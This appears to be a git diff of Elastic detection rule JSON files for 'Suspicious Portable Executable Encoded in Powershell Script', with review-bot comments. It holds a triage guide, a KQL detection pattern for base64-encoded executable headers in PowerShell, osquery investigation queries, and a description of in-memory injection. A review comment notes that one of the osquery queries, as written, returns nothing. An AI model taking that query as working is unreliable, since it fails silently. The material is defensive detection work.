\"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
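Review bot: The osquery query labelled "Osquery - Retrieve Services Running on User Accounts" in the new `note` line of the `@@ -12,7 +12,7 @@` hunk keeps `user_account == null` inside its `NOT (...)` filter; in SQLite, which osquery is built on, a comparison with NULL evaluates to NULL and `FALSE OR NULL` is NULL, so the WHERE clause is unknown for every row and the guide's query returns nothing. The comparison should be `user_account IS NULL` so that rows with a non-system account actually come back. The same line also closes the account-investigation step with "to the target host after the registry modification", which appears copied from a registry rule; "after the script block execution" would fit this rule. Both carry over unchanged into the _107 snapshot's `@@ -12` hunk and into the _108 one, whose hunk runs past the visible range; since these files look generated, the fix presumably belongs in the rule source.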
diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_107.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_107.json
index 1be08a57349..efcf8e50a1a 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_107.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json
index d32c85f078b..258a1685f4a 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
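Review bot: The rewritten `setup` string on the `+` line of the `@@ -47,7 +47,7 @@` hunk keeps the duplicated word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; since this line is already being rewritten, it should read `Steps to implement the logging policy with Advanced Audit Configuration:`. The same sentence is on the `+ "setup"` line of the `@@ -47,7 +47,7 @@` hunk for `ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json` further down. The heading also names Advanced Audit Configuration while the fenced path it introduces is `Computer Configuration > Administrative Templates > Windows PowerShell`, so `with Group Policy` would describe the steps that follow more accurately.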
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json
index 98bf42b43d7..6e1c561605b 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
